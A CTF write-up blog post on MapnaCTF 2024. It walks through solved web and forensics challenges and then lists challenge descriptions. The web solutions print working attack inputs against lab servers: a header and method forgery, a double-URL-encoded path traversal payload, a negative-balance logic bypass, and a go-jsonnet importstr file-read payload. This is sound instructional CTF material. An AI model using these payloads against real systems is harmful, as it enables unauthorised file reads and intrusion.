MapnaCTF 2024 - Challenges/Writeups

Multiple members of IrisSec and myself (a new member of IrisSec!) participated in MapnaCTF 2024 and placed 2nd! This writeup only contains the challenges I personally solved or contributed to. I hope you enjoy!

You can join the Discord community for this CTF (with more writeups!) here.

Web/Flag Holding (289 solves)

Hopefully you know how web works…

Initially with the webserver given I visit the page, and this particular portion of text is displayed:

You are not coming from "http://flagland.internal/”

I move to cURL to do this challenge, and determine this is probably referring to the Referer header.

$ curl "http://18.184.219.56:8080/" -H "Referer: http://flagland.internal/"
Unspecified "secret".

Interesting, I make a new parameter secret and set it with a value of 1.

$ curl "http://18.184.219.56:8080/?secret=1" -H "Referer: http://flagland.internal/"
Incorrect secret. <!-- hint: secret is ____ which is the name of the protocol that both this server and your browser agrees on... —>

The hint is likely to be filled with http.

$ curl "http://18.184.219.56:8080/?secret=http" -H "Referer: http://flagland.internal/"
Sorry we don't have "GET" here but we might have other things like "FLAG”.

I change the method from GET to FLAG.

$ curl -X FLAG "http://18.184.219.56:8080/?secret=http" -H "Referer: http://flagland.internal/"
MAPNA{533m5-l1k3-y0u-kn0w-h77p-1836a2f}

There we go!

Flag: MAPNA{533m5-l1k3-y0u-kn0w-h77p-1836a2f}

Files: None provided :(

Web/Novel reader (119 solves)

We have many fun novels for ya…

The website seems to be an article reader with one article we cannot read, and we can only read a few words with our balance.

I look into the web request for the article reading and the source code has the following segment:

name = unquote(name)
if(not name.startswith('public/')):
    return {'success': False, 'msg': 'You can only read public novels!'}, 400

unquote from urllib.parse and does URL decoding, so we can avoid that with layering of url encoding. Eg. %2e -> %252e

We then see that the path has to start with public/ to be read.

We can achieve path traversal to read the flag using the following payload: public/%252e%252e/%252e%252e/flag.txt

Making the final web request to /api/read/public/%252e%252e/%252e%252e/flag.txt gives us the flag.

Flag: MAPNA{uhhh-1-7h1nk-1-f0r607-70-ch3ck-cr3d17>0-4b331d4b}

Files: novel-reader_d78366cb079727a6bd3809219df9bc7835d17fd1.txz

Web/Novel reader 2 (104 solves)

Submit the second flag of “Novel Reader” here

The same website also has another file we have to read inside private/A-Secret-Tale.txt

Looking at the word balance, we can seem to set negative values by purchasing -100 words, for example.

The source code for reading the file is as follows:

buf = readFile(name).split(' ')
buf = ' '.join(buf[0:session['words_balance']])+'... Charge your account to unlock more of the novel!'

If we make session['words_balance'] equal to -1 we can read the whole file!

I set my word balance to -1 and then use the path traversal vulnerability to read the file.

Flag: MAPNA{uhhh-y0u-607-m3-4641n-3f4b38571}

Files: novel-reader_d78366cb079727a6bd3809219df9bc7835d17fd1.txz

Web/Advanced JSON Cutifier (74 solves)

My homework was to write a JSON beautifier. Just Indenting JSON files was too boring that’s why I decided to add some features to my project using a popular (More than 1k stars on GitHub!! ) library to make my project more exciting. Important: You can’t read any file other than /flag.txt on the remote environment.

Looking at the source code provided first we can see a redacted Go library from github.

import (
    "net/http"
    "github.com/gin-gonic/gin"
    "github.com/REDACTED/REDACTED"
)

I cause some errors on the server to try and identify the library:

Expected token OPERATOR but got "}"
Expected a comma before next field

Both these errors point towards the go-jsonnet library, which meets the stars requirement in the challenge description.

I end up looking for ways to read files in the issues section of the repo and find this issue.

It mentions a payload like the following:

{
    "wow so advanced!!": importstr "/flag.txt”
}

Running it in the parser we are given the flag:

{
   "wow so advanced!!": "MAPNA{5uch-4-u53ful-f347ur3-a23f98d}\n\n"
}

Flag: MAPNA{5uch-4-u53ful-f347ur3-a23f98d}

Files: player_a466f9f2a43ac42473015d72342c262e8d4b9519.txz

Forensics/Tampered (48 solves)

Our MAPNA flags repository was compromised, with attackers introducing one invalid flag. Can you identify the counterfeit flag? Note: Forgot the flag format in the rules pages, just find the tampered one. You are not allowed to brute-force the flag in scoreboard, this will result in your team being blocked.

Looking through the given files, we are given a very long list of flags.

Basics scan show nothing out of the ordinary in flag format or length, so I look into the newlines after each flag.

I write a basic script to split all lines by the common ending \r\r\n and if any of the strings don’t meet the expected length, to print them.

with open('flags.txt','rb') as f:
    d=f.read().split(b'\r\r\n')
    for x in d:
        if x != b'':
            if len(x) != 47:
                print(x)

$ python3 check.py
b'MAPNA{Tx,D51otN\\eUf7qQ7>ToSYQ\\;5P6jTIHH#6TL+uv}\r\n\rMAPNA{R6Z@//\\>caZ%%k)=ci3$IyOkSGK%w<"V7kgesY&k}’

We can see one flag ends with \r\n\r, which is our out of place flag.

Flag: MAPNA{Tx,D51otN\\eUf7qQ7>ToSYQ\\;5P6jTIHH#6TL+uv}

Files: tampered_6fb083f974d05371cef19c0e585ba5c59da23aa8.txz

Forensics/PLC I 🤖 (355 solves)

The MAPNA CERT team has identified an intrusion into the plant’s PLCs, discovering a covert message transferred to the PLC. Can you uncover this secret message?

If we open the given PCAP we can look at it in Wireshark, looking at the packets, we can see in some of them small segments of data.

After looking through all the packets I see the following:

• 3:Ld_4lW4 (Packet 19)
• 5:3__PaAD (Packet 31)
• 1:MAPNA{y (Packet 35)
• 4:yS__CaR (Packet 39)
• 6:d1n9!!} (Packet 46)
• 2:0U_sHOu (Packet 50)

Compiled together in the numerical order we get the flag.

Flag: MAPNA{y0U_sHOuLd_4lW4yS__CaR3__PaADd1n9!!}

Files: PLC_0829b4ef9780677086043add8592e996f21e0bbe.txz

Forensics/PLC II 🤖 (11 solves)

After extensive investigations, the MAPNA forensics team discovered that the attackers attempted to manipulate the PLC time. Please identify the precise time in the following format: year:month:day:hour:minute:second:millisecond. The flag is MAPNA{sha256(datetime)}.

Looking into the data inside the packets, we see that the first two packets start with 03000016. I looked this up on GitHub and found some scripts.

This lead me down to S7comm and in the examples section was example time setting traffic.

I compare the raw TCP of the example traffic to the given traffic and only 1 line isn’t similar.

The portion of the example data that was different (00191408201159330400) is a date as parsed in Wiresharks S7comm parsing.

Looking at our file we see 00202309211959299490 which can be parsed to 2023:09:21:19:59:29:949.

SHA256 sum of that gives us our flag.

Flag: MAPNA{9effd248efdf066cf432a21a34d87db56d0d0a7e4fe9bb3af6ef6f125fc36cfa}

Files: PLC_0829b4ef9780677086043add8592e996f21e0bbe.txz

Forensics/XXG (11 solves)

Welcome to the Forensics XXG challenge! Our investigator stumbled upon a mysterious file. Can you uncover the hidden message?

Looking inside this file initially is a PNG, but looking through the strings we can see a .goutputstream, gimp-image-metadata among other things.

Searching leads to some results but one of particular interest, I see a reply mentioning .xcf files, and have a look at where gimp-image-metadata is to start looking at the data.

Gi?? ??? v014    È         ú            B  B                         õ   ????-image-grid       ¬(style solid)
(fgcolor (color-rgba 0 0 0 1))
(bgcolor (color-rgba 1 1 1 1))
(xspacing 10)
(yspacing 10)
(spacing-unit inches)
(xoffset 0)
(yoffset 0)
(offset-unit inches)
    gamma       0.45455000000000001    gimp-image-metadata      ç<?xml version='1.0' encoding='UTF-8'?>
<metadata>
  <tag name="Exif.Image.BitsPerSample">16 16 16</tag>
  <tag name="Exif.Image.ImageLength">12</tag>
  <tag name="Exif.Image.ImageWidth">200</tag>
  <tag name="Exif.Image.Orientation">1</tag>
  <tag name="Exif.Image.ResolutionUnit">2</tag>
  <tag name="Exif.Image.XResolution">300/1</tag>
  <tag name="Exif.Image.YResolution">300/1</tag>
  <tag name="Exif.Photo.ColorSpace">1</tag>
  <tag name="Xmp.tiff.Orientation">1</tag>
</metadata>
               l                   È         	????.???                 ÿ   !   ?€              	          "                    
                                         
                                 %          $   ÿÿÿÿ   #   ÿÿÿÿ                       u           È            ¡      a      m           È         Ñ      M      Ÿ      á         ÿçãÏÿÿì¿ÿÿ]¦ÿÿã VFÂãäÿÿKÿþ]¦ÿê³EÖSS¯ÕS[V÷ãSS¯ðRPDÔÿދOMÿã=uÿÿ—A¿ÿôUTÿÿã_ÿî=ã<OÿÿKÿÿôUTÿüZßã_ÿùðóÿ¬ã_ÿþšœÿ×=ÿqÿãlCþÿS}¿ÿ¢ Wéÿã_ÿÿ=ãqZªÿKÿÿ¢ WéÿÿIðã_ÿü€¹ã_ÿý¸VôÿÅa¦?ÿãkÁáo¿ÿLðªÿã_ÿÏWãlæ%îKÿÿLðªÿvuÿã WWÎÿÿäFüã WWÎÿ 5ƒüÿׇ	¿ÿãkÙh‡É¿åOJ:ÿã VhéãkÿŒbNÿåOJ:ÿÿKöã_ÿúñIàÿã_ÿýýlŸÿë¯má>ÿãkÿGNÿ¿‹²ÿÿ]×ã_ÿîãkÿû+*ÿ‹²ÿÿ]×ÿWçã_ÿùøRÒÿÿã_ÿûþÿÿ¦‘ÿ뎮ÿáÿãkÿŽ~ÿ¿Dûÿÿ¼zã_ÿîãkÿÿ¾ÿDûÿÿ¼zÿeÎã_ÿù&KK‰ã_ÿûšIUZóÿüèSk^!ÿýÙVðQÿÿýkÿùBÿ ÿçãÏÿÿì¿ÿÿ]¦ÿÿã VFÂãäÿÿKÿþ]¦ÿê³E{SS¯ÕS[V÷ãSS¯ðRPDÔÿދOMÿã=uÿÿ—A¿ÿôUTÿÿã_ÿî=ã<OÿÿKÿÿôUTÿüZßã_ÿùðóÿ¬ã_ÿþšœÿ×=ÿqÿãlCþÿS}¿ÿ¢ Wéÿã_ÿÿ=ãqZªÿKÿÿ¢ WéÿÿIðã_ÿü€¹ã_ÿý¸VôÿÅa¦?ÿãkÁáo¿ÿLðªÿã_ÿÏWãlæ%îKÿÿLðªÿvuÿã WWÎÿÿäFüã WWÎÿ 5ƒüÿׇ	¿ÿãkÙh‡É¿åOJ:ÿã VhéãkÿŒbNÿåOJ:ÿÿKöã_ÿúñIàÿã_ÿýýlŸÿë¯má>ÿãkÿGNÿ¿‹²ÿÿ]×ã_ÿîãkÿû+*ÿ‹²ÿÿ]×ÿWçã_ÿùøRÒÿÿã_ÿûþÿÿ¦‘ÿ뎮ÿáÿãkÿŽ~ÿ¿Dûÿÿ¼zã_ÿîãkÿÿ¾ÿDûÿÿ¼zÿeÎã_ÿù&KK‰ã_ÿûšIUZóÿüèSk^!ÿýÙVðQÿÿýkÿùBÿ €ÿÿ÷ÿðã XNÿãSS¯ðRPDÔÿ÷saÊÑ"Ûÿã_ÿûÇP[Pòÿöò OOáGäÿëBÿþ—Æÿøã_ÿÿ?ïã_ÿþšœÿöþEÿ÷_hÛÿã_ÿûñúÿ–¢ÿþárÿû½gÿqµÿÿóÿøã_ÿüCøã_ÿý¸Vôÿö“uÿÿoÛÿã_ÿýþgÁÿþЂÿôAÀ>ÿÊN]Žÿÿ×ùÿðã W.‘ÿã WWÎÿ 5ƒüÿþûGÿûoÛÿã_ÿüž>VùÿôÎE_jñÿº	·ÿ¥ÿýØDþÿøã_ÿþYÏã_ÿýýlŸÿþûGÿûoÛÿã_ÿþ¦ÿò®|ÿÿ4ÿÿùƒPÂÿÿøã_ÿÿjÀã_ÿûþÿÿ¦‘ÿþûGÿûoÛÿã_ÿûýÿÿºxÿû¿{ÿÿ?ÿúõ@ÿ›AÚÿøã WPfýã_ÿûšIUZóÿþûGÿóoÛÿãOO­–S\Uéÿò·X]Yìÿÿ?ÿÿ¥Z[‘Bÿÿýkÿù
ÿÿýkÿùÿÿýkÿùMÿ €ÿÿ÷ÿðã XNÿãSS¯ðRPDÔÿ÷saÊÑ"Ûÿã_ÿûÇP[Pòÿöò OOáGäÿëBÿþ—Æÿøã_ÿÿ?ïã_ÿþšœÿöþEÿ÷_hÛÿã_ÿûñúÿ–¢ÿþárÿû½gÿqµÿÿóÿøã_ÿüCøã_ÿý¸Vôÿö“uÿÿoÛÿã_ÿýþgÁÿþЂÿôAÀ>ÿÊN]Žÿÿ×ùÿðã W.‘ÿã WWÎÿ 5ƒüÿþûGÿûoÛÿã_ÿüž>VùÿôÎE_jñÿº	·ÿ¥ÿýØDþÿøã_ÿþYÏã_ÿýýlŸÿþûGÿûoÛÿã_ÿþ¦ÿò®|ÿÿ4ÿÿùƒPÂÿÿøã_ÿÿjÀã_ÿûþÿÿ¦‘ÿþûGÿûoÛÿã_ÿûýÿÿºxÿû¿{ÿÿ?ÿúõ@ÿ›AÚÿøã WPfýã_ÿûšIUZóÿþûGÿóoÛÿãOO­–S\Uéÿò·X]Yìÿÿ?ÿÿ¥Z[‘Bÿÿýkÿù
ÿÿýkÿùÿÿýkÿùMÿ €ÿOñDXÇP[PòãÏÿÿì¿	ÿýä
ûÿûãSS¯ÿ÷ãäÿÿKÿюÿçÇP[PòxWGÿÿ“¯ñúÿ–¢ã=uÿÿ—A¿	ÿýfBûÿþã_ÿúã<OÿÿKÿãñúÿ–¢þÿÚÿÿDüÿÿþgÁãlCþÿS}¿ÊN]ŽÿöÇQûÇqT§ã_ÿØãqZªÿKÿÇýeVfÿÿþgÁÿÿ•ÿºÿÿž>VùãkÁáo¿¥ÿòýSøOûÇCþÿã WWÎÿõãlæ%îKÿÇ®†ÿöž>Vùÿ¸pÿRåÿò¦ãkÙh‡É¿ùƒPÂÿõ–±ÿOûÇ}ÿÿã_ÿõãkÿŒbNÿLj´ÿ榁ÿeýßVÿÿýÿÿºxãkÿGNÿ¿ÿÿõ@ÿõTOOTÇÿÿã_ÿÖãkÿû+*ÿÇ«‡ÿÿýÿÿºxÿâÿu»ÿÿ–S\UéãkÿŽ~ÿ¿¥Z[‘ÿõOûÇÿÿãOO­ÿëãkÿÿ¾ÿÇübU[–S\Uéÿ3öSÿÿýkÿùÿÿýkÿùSÿ €ÿOñDXÇP[PòãÏÿÿì¿	ÿýä
ûÿûãSS¯ÿ÷ãäÿÿKÿюÿçÇP[PòxWGÿÿ“¯ñúÿ–¢ã=uÿÿ—A¿	ÿýfBûÿþã_ÿúã<OÿÿKÿãñúÿ–¢þÿÚÿÿDüÿÿþgÁãlCþÿS}¿ÊN]ŽÿöÇQûÇqT§ã_ÿØãqZªÿKÿÇýeVfÿÿþgÁÿÿ•ÿºÿÿž>VùãkÁáo¿¥ÿòýSøOûÇCþÿã WWÎÿõãlæ%îKÿÇ®†ÿöž>Vùÿ¸pÿRåÿò¦ãkÙh‡É¿ùƒPÂÿõ–±ÿOûÇ}ÿÿã_ÿõãkÿŒbNÿLj´ÿ榁ÿeýßVÿÿýÿÿºxãkÿGNÿ¿ÿÿõ@ÿõTOOTÇÿÿã_ÿÖãkÿû+*ÿÇ«‡ÿÿýÿÿºxÿâÿu»ÿÿ–S\UéãkÿŽ~ÿ¿¥Z[‘ÿõOûÇÿÿãOO­ÿëãkÿÿ¾ÿÇübU[–S\Uéÿ3öSÿÿýkÿùÿÿýkÿùSÿÿûÌÄ^…cÿâkÐiÿDöÿÿ™ÜuÿRèÿÿþèÿ®-èÿÿöªÿ‹áÿûûêÿPóÿûÄaÿGûÿþ‹šÿÿûÌÄ^…cÿâkÐiÿDöÿÿ™ÜuÿRèÿÿþèÿ®-èÿÿöªÿ‹áÿûûêÿPóÿûÄaÿGûÿþ‹šÿ   d          2

We can see the start of this data having some question marks. I can see ????-image-grid, which I assume ???? to be gimp.

Looking further into the .XCF format we can see the header should be gimp xcf.

The full data is then:

gimp xcf v014    È         ú            B  B                         õ   gimp-image-grid       ¬(style solid)
(fgcolor (color-rgba 0 0 0 1))
(bgcolor (color-rgba 1 1 1 1))
(xspacing 10)
(yspacing 10)
(spacing-unit inches)
(xoffset 0)
(yoffset 0)
(offset-unit inches)
    gamma       0.45455000000000001    gimp-image-metadata      ç<?xml version='1.0' encoding='UTF-8'?>
<metadata>
  <tag name="Exif.Image.BitsPerSample">16 16 16</tag>
  <tag name="Exif.Image.ImageLength">12</tag>
  <tag name="Exif.Image.ImageWidth">200</tag>
  <tag name="Exif.Image.Orientation">1</tag>
  <tag name="Exif.Image.ResolutionUnit">2</tag>
  <tag name="Exif.Image.XResolution">300/1</tag>
  <tag name="Exif.Image.YResolution">300/1</tag>
  <tag name="Exif.Photo.ColorSpace">1</tag>
  <tag name="Xmp.tiff.Orientation">1</tag>
</metadata>
               l                   È         	????.???                 ÿ   !   ?€              	          "                    
                                         
                                 %          $   ÿÿÿÿ   #   ÿÿÿÿ                       u           È            ¡      a      m           È         Ñ      M      Ÿ      á         ÿçãÏÿÿì¿ÿÿ]¦ÿÿã VFÂãäÿÿKÿþ]¦ÿê³EÖSS¯ÕS[V÷ãSS¯ðRPDÔÿދOMÿã=uÿÿ—A¿ÿôUTÿÿã_ÿî=ã<OÿÿKÿÿôUTÿüZßã_ÿùðóÿ¬ã_ÿþšœÿ×=ÿqÿãlCþÿS}¿ÿ¢ Wéÿã_ÿÿ=ãqZªÿKÿÿ¢ WéÿÿIðã_ÿü€¹ã_ÿý¸VôÿÅa¦?ÿãkÁáo¿ÿLðªÿã_ÿÏWãlæ%îKÿÿLðªÿvuÿã WWÎÿÿäFüã WWÎÿ 5ƒüÿׇ	¿ÿãkÙh‡É¿åOJ:ÿã VhéãkÿŒbNÿåOJ:ÿÿKöã_ÿúñIàÿã_ÿýýlŸÿë¯má>ÿãkÿGNÿ¿‹²ÿÿ]×ã_ÿîãkÿû+*ÿ‹²ÿÿ]×ÿWçã_ÿùøRÒÿÿã_ÿûþÿÿ¦‘ÿ뎮ÿáÿãkÿŽ~ÿ¿Dûÿÿ¼zã_ÿîãkÿÿ¾ÿDûÿÿ¼zÿeÎã_ÿù&KK‰ã_ÿûšIUZóÿüèSk^!ÿýÙVðQÿÿýkÿùBÿ ÿçãÏÿÿì¿ÿÿ]¦ÿÿã VFÂãäÿÿKÿþ]¦ÿê³E{SS¯ÕS[V÷ãSS¯ðRPDÔÿދOMÿã=uÿÿ—A¿ÿôUTÿÿã_ÿî=ã<OÿÿKÿÿôUTÿüZßã_ÿùðóÿ¬ã_ÿþšœÿ×=ÿqÿãlCþÿS}¿ÿ¢ Wéÿã_ÿÿ=ãqZªÿKÿÿ¢ WéÿÿIðã_ÿü€¹ã_ÿý¸VôÿÅa¦?ÿãkÁáo¿ÿLðªÿã_ÿÏWãlæ%îKÿÿLðªÿvuÿã WWÎÿÿäFüã WWÎÿ 5ƒüÿׇ	¿ÿãkÙh‡É¿åOJ:ÿã VhéãkÿŒbNÿåOJ:ÿÿKöã_ÿúñIàÿã_ÿýýlŸÿë¯má>ÿãkÿGNÿ¿‹²ÿÿ]×ã_ÿîãkÿû+*ÿ‹²ÿÿ]×ÿWçã_ÿùøRÒÿÿã_ÿûþÿÿ¦‘ÿ뎮ÿáÿãkÿŽ~ÿ¿Dûÿÿ¼zã_ÿîãkÿÿ¾ÿDûÿÿ¼zÿeÎã_ÿù&KK‰ã_ÿûšIUZóÿüèSk^!ÿýÙVðQÿÿýkÿùBÿ €ÿÿ÷ÿðã XNÿãSS¯ðRPDÔÿ÷saÊÑ"Ûÿã_ÿûÇP[Pòÿöò OOáGäÿëBÿþ—Æÿøã_ÿÿ?ïã_ÿþšœÿöþEÿ÷_hÛÿã_ÿûñúÿ–¢ÿþárÿû½gÿqµÿÿóÿøã_ÿüCøã_ÿý¸Vôÿö“uÿÿoÛÿã_ÿýþgÁÿþЂÿôAÀ>ÿÊN]Žÿÿ×ùÿðã W.‘ÿã WWÎÿ 5ƒüÿþûGÿûoÛÿã_ÿüž>VùÿôÎE_jñÿº	·ÿ¥ÿýØDþÿøã_ÿþYÏã_ÿýýlŸÿþûGÿûoÛÿã_ÿþ¦ÿò®|ÿÿ4ÿÿùƒPÂÿÿøã_ÿÿjÀã_ÿûþÿÿ¦‘ÿþûGÿûoÛÿã_ÿûýÿÿºxÿû¿{ÿÿ?ÿúõ@ÿ›AÚÿøã WPfýã_ÿûšIUZóÿþûGÿóoÛÿãOO­–S\Uéÿò·X]Yìÿÿ?ÿÿ¥Z[‘Bÿÿýkÿù
ÿÿýkÿùÿÿýkÿùMÿ €ÿÿ÷ÿðã XNÿãSS¯ðRPDÔÿ÷saÊÑ"Ûÿã_ÿûÇP[Pòÿöò OOáGäÿëBÿþ—Æÿøã_ÿÿ?ïã_ÿþšœÿöþEÿ÷_hÛÿã_ÿûñúÿ–¢ÿþárÿû½gÿqµÿÿóÿøã_ÿüCøã_ÿý¸Vôÿö“uÿÿoÛÿã_ÿýþgÁÿþЂÿôAÀ>ÿÊN]Žÿÿ×ùÿðã W.‘ÿã WWÎÿ 5ƒüÿþûGÿûoÛÿã_ÿüž>VùÿôÎE_jñÿº	·ÿ¥ÿýØDþÿøã_ÿþYÏã_ÿýýlŸÿþûGÿûoÛÿã_ÿþ¦ÿò®|ÿÿ4ÿÿùƒPÂÿÿøã_ÿÿjÀã_ÿûþÿÿ¦‘ÿþûGÿûoÛÿã_ÿûýÿÿºxÿû¿{ÿÿ?ÿúõ@ÿ›AÚÿøã WPfýã_ÿûšIUZóÿþûGÿóoÛÿãOO­–S\Uéÿò·X]Yìÿÿ?ÿÿ¥Z[‘Bÿÿýkÿù
ÿÿýkÿùÿÿýkÿùMÿ €ÿOñDXÇP[PòãÏÿÿì¿	ÿýä
ûÿûãSS¯ÿ÷ãäÿÿKÿюÿçÇP[PòxWGÿÿ“¯ñúÿ–¢ã=uÿÿ—A¿	ÿýfBûÿþã_ÿúã<OÿÿKÿãñúÿ–¢þÿÚÿÿDüÿÿþgÁãlCþÿS}¿ÊN]ŽÿöÇQûÇqT§ã_ÿØãqZªÿKÿÇýeVfÿÿþgÁÿÿ•ÿºÿÿž>VùãkÁáo¿¥ÿòýSøOûÇCþÿã WWÎÿõãlæ%îKÿÇ®†ÿöž>Vùÿ¸pÿRåÿò¦ãkÙh‡É¿ùƒPÂÿõ–±ÿOûÇ}ÿÿã_ÿõãkÿŒbNÿLj´ÿ榁ÿeýßVÿÿýÿÿºxãkÿGNÿ¿ÿÿõ@ÿõTOOTÇÿÿã_ÿÖãkÿû+*ÿÇ«‡ÿÿýÿÿºxÿâÿu»ÿÿ–S\UéãkÿŽ~ÿ¿¥Z[‘ÿõOûÇÿÿãOO­ÿëãkÿÿ¾ÿÇübU[–S\Uéÿ3öSÿÿýkÿùÿÿýkÿùSÿ €ÿOñDXÇP[PòãÏÿÿì¿	ÿýä
ûÿûãSS¯ÿ÷ãäÿÿKÿюÿçÇP[PòxWGÿÿ“¯ñúÿ–¢ã=uÿÿ—A¿	ÿýfBûÿþã_ÿúã<OÿÿKÿãñúÿ–¢þÿÚÿÿDüÿÿþgÁãlCþÿS}¿ÊN]ŽÿöÇQûÇqT§ã_ÿØãqZªÿKÿÇýeVfÿÿþgÁÿÿ•ÿºÿÿž>VùãkÁáo¿¥ÿòýSøOûÇCþÿã WWÎÿõãlæ%îKÿÇ®†ÿöž>Vùÿ¸pÿRåÿò¦ãkÙh‡É¿ùƒPÂÿõ–±ÿOûÇ}ÿÿã_ÿõãkÿŒbNÿLj´ÿ榁ÿeýßVÿÿýÿÿºxãkÿGNÿ¿ÿÿõ@ÿõTOOTÇÿÿã_ÿÖãkÿû+*ÿÇ«‡ÿÿýÿÿºxÿâÿu»ÿÿ–S\UéãkÿŽ~ÿ¿¥Z[‘ÿõOûÇÿÿãOO­ÿëãkÿÿ¾ÿÇübU[–S\Uéÿ3öSÿÿýkÿùÿÿýkÿùSÿÿûÌÄ^…cÿâkÐiÿDöÿÿ™ÜuÿRèÿÿþèÿ®-èÿÿöªÿ‹áÿûûêÿPóÿûÄaÿGûÿþ‹šÿÿûÌÄ^…cÿâkÐiÿDöÿÿ™ÜuÿRèÿÿþèÿ®-èÿÿöªÿ‹áÿûûêÿPóÿûÄaÿGûÿþ‹šÿ   d          2

Upon trying to open this in GIMP we are given an error of XCF error: unsupported XCF file version 14 encountered.

We can change the version to v001 in the file at the top.

And we now encounter that the data is corrupt, hmm…

Looking around at XCF file versions it seems people use v011. So trying v011 ends up giving a result!!

There we go!

Flag: MAPNA{F2FS_&_BFS_f1L3_5Ys73Ms_4rE_Nic3?!}

Files: MAPNA.XXG_04de6faaebbf29fb11639ef77530d3b85f09a2ce.txz

Thanks for reading!

Feel free to give me feedback or follow me on Twitter.

Unsolved & Challenge Archival

A list of challenges I didn’t solve, and the downloads (if provided) to try them for yourself! All challenges are sorted by solve count.

Cryptography - 3/6 solved

✅ What next? - 326 solves

In this task, we explore the realm of cryptographically secure random generators, where predicting the next output is deemed impossible. Are you ready to test your luck and skill?

Files: what_next_a4fa51cf32daf6a280431a1bced21a2ed1ca1c7d.txz

✅ What next II? - 69 solves

Again, in this task, we explore the realm of cryptographically secure random generators, where predicting the next output is deemed impossible. Are you ready to test your luck and skill this time?

Files: what_next_II_8bf8c5be355d718be974f7cbb4374072d2a039df.txz

✅ Be Fast🏃 - 34 solves

Rapid mastery of breaking symmetric encryption, deciphering codes with precision, and navigating complexities with unprecedented speed and efficiency are requirements for every professional cryptographer. So, be fast
nc 3.75.180.117 37773

Files: be_fast_dd26c22fa530432fd9ca1ee3b80d3036cff3d472.txz

GLNQ - 13 solves

Solving the DLP in matrices over a finite field is no trivial task. What are your thoughts on this GLNQ belief?
Note: flag = MAPNA{m}, Don’t convert m to bytes.

Files: glnq_9c3935a6c97ee38b4ba28e28da342b26ac13b45a.txz

Shibs - 10 solves

Dive into a cryptographic maze, untangle intricate codes, and unleash your creativity in this unique CTF experience by conquering the Shibs challenge.

Files: shibs_a69b9a6ece52d0dfdd60a1d8de96e5d2d709d9a0.txz

Isogenies - 6 solves

Explore the strange world of isogenies in cryptosystems to uncover the secret flag.

Files: isogenies_94011f7ea3b9df115a8addc45ba5965be9b895f1.txz

Forensics - 5/6 solved

✅ PLC I 🤖 - 384 solves

The MAPNA CERT team has identified an intrusion into the plant’s PLCs, discovering a covert message transferred to the PLC. Can you uncover this secret message?

Files: PLC_0829b4ef9780677086043add8592e996f21e0bbe.txz

✅ Tampered - 67 solves

Our MAPNA flags repository was compromised, with attackers introducing one invalid flag. Can you identify the counterfeit flag?
Note: Forgot the flag format in the rules pages, just find the tampered one.

Files: tampered_6fb083f974d05371cef19c0e585ba5c59da23aa8.txz

✅ PLC II 🤖 - 13 solves

After extensive investigations, the MAPNA forensics team discovered that the attackers attempted to manipulate the PLC time. Please identify the precise time in the following format:
year:month:day:hour:minute:second:millisecond
The flag is MAPNA{sha256(datetime)}.

Files: PLC_0829b4ef9780677086043add8592e996f21e0bbe.txz

✅ XXG - 11 solves

Welcome to the Forensics XXG challenge! Our investigator stumbled upon a mysterious file. Can you uncover the hidden message?

Files: MAPNA.XXG_04de6faaebbf29fb11639ef77530d3b85f09a2ce.txz

JigBoy - 5 solves

Jigboy, the superhero, possesses the remarkable ability to reel in colossal fish from the depths of the deep blue sea.

Files: flag.damaged_0ea52d00e06812858295d9e8cea9c765517e8b6d.txz

✅ Mitrek - 2 solves

In the MAPNA field, a malicious traffic, was intercepted, with an unidentified protocol. Investigators suspect file transmission. Seek secret message.
Note: The file is updated, please download again.

Files: Mitrek_5a6bdca24a8bcd1fd507214e14e9dd2ae4ec0006.txz

Pwnable - 0/4 solved

ninipwn - 57 solves

pwn ^ pwn ^ pwn ^ pwn ^ pwn ^ pwn
nc 3.75.185.198 7000

Files: ninipwn_be672cb6b51e073adabe9eea358c2d8a394ed2a7.txz

Buggy Paint - 16 solves

I wrote a paint for myself but It seems kinda buggy
nc 3.75.185.198 2000

Files: buggypaint_333dedd782ee96a33bec96cb561e68f20c3e7172.txz

Protector - 12 solves

my flag is protected! what are you gonna do
nc 3.75.185.198 10000

Files: protector_b8e161eab7a18b9d3942080b4c68ed2d13f251cc.txz

U2S - 2 solves

I just changed S2U to U2S… This shouldn’t lead to scary things right?
nc 3.75.185.198 6666

Files: u2s_4a18b813cd815ff3fdd52f5d306decb8462674ff.txz

Reverse - 6/6 solved

✅ Compile Me! 🔨 - 142 solves

Compile the given code and execute the resulting binary, passing the source code file as an argument, to obtain the flag.
Welcome,to,MAPNA,CTF,Year_2k24;main(){for(++CTF;to=-~getchar();Welcome+=11==to,Year_2k24++)CTF=to>0xe^012>to&&'`'^to^65?!to:!CTF?++MAPNA:CTF;printf("MAPNA{%4d__%d__%d_!}\n",(to+20)^(Welcome+24)+1390,MAPNA+=(!CTF&&Year_2k24)+10,Year_2k24+31337);}

Files: None provided :(

✅ Heaverse - 42 solves

Heaverse, a paradoxical binary that defies logic: reverse it without reversing it. Can you navigate its enigmatic depths?
Flag format: MAPNA{CAPITAL_WORDS_THAT_YOU_FIND}

Files: heaverse_845b76c13d88953ff0f6a98442c73c025361a3f4.txz

✅ Prism💎 - 23 solves

Prism has implemented a sophisticated anti-reverse engineering technique in the binary. Can you bypass this mechanism to obtain the flag?

Files: Prism_6c93a8c550a949c2aacec5af102cf8a1949b8c97.txz

✅ Tetim - 7 solves

Begin on a formidable journey into the realm of Zig reverse with tetim, a challenging and intricate reverse engineering task. Unusual for CTFs, it features Zig language binaries and promises a riveting experience, designed for those seeking revenge at MAPNA CTF.

Files: tetim_e123d1a419f4bdef19f1981a111fd850a59c03d4.txz

✅ Locate Me! - 5 solves

Guys, in this reverse engineering challenge, your task is to skillfully locate me within the intricate digital labyrinth.
nc 95.216.191.248 13770

Files: locateme_3ad6837da934a2a05dc2162c029efe1a02069703.txz

✅ Time Traveler 🕰️ - 2 solves

Enjoy the vintage with a time traveler! 🎈🎶📻
Note: Do not forget to add MAPNA at the beginning of flag!

Files: time_traveler_1e34fc22a96751169aff190bf3bb57490fa8a30a.txz

Web - 5/6 solved

✅ Flag Holding - 318 solves

Hopefully you know how web works…
http://18.184.219.56:8080/

Files: None provided :(

✅ Novel reader - 144 solves

We have many fun novels for ya…
http://3.64.250.135:9000

Files: novel-reader_d78366cb079727a6bd3809219df9bc7835d17fd1.txz

✅ Novel Reader 2 - 125 solves

Submit the second flag of “Novel Reader” here

Files: novel-reader_d78366cb079727a6bd3809219df9bc7835d17fd1.txz

✅ Advanced JSON Cutifier - 88 solves

My homework was to write a JSON beautifier. Just Indenting JSON files was too boring that’s why I decided to add some features to my project using a popular (More than 1k stars on GitHub!! ) library to make my project more exciting.
Important: You can’t read any file other than /flag.txt on the remote environment.
http://3.64.250.135:8005

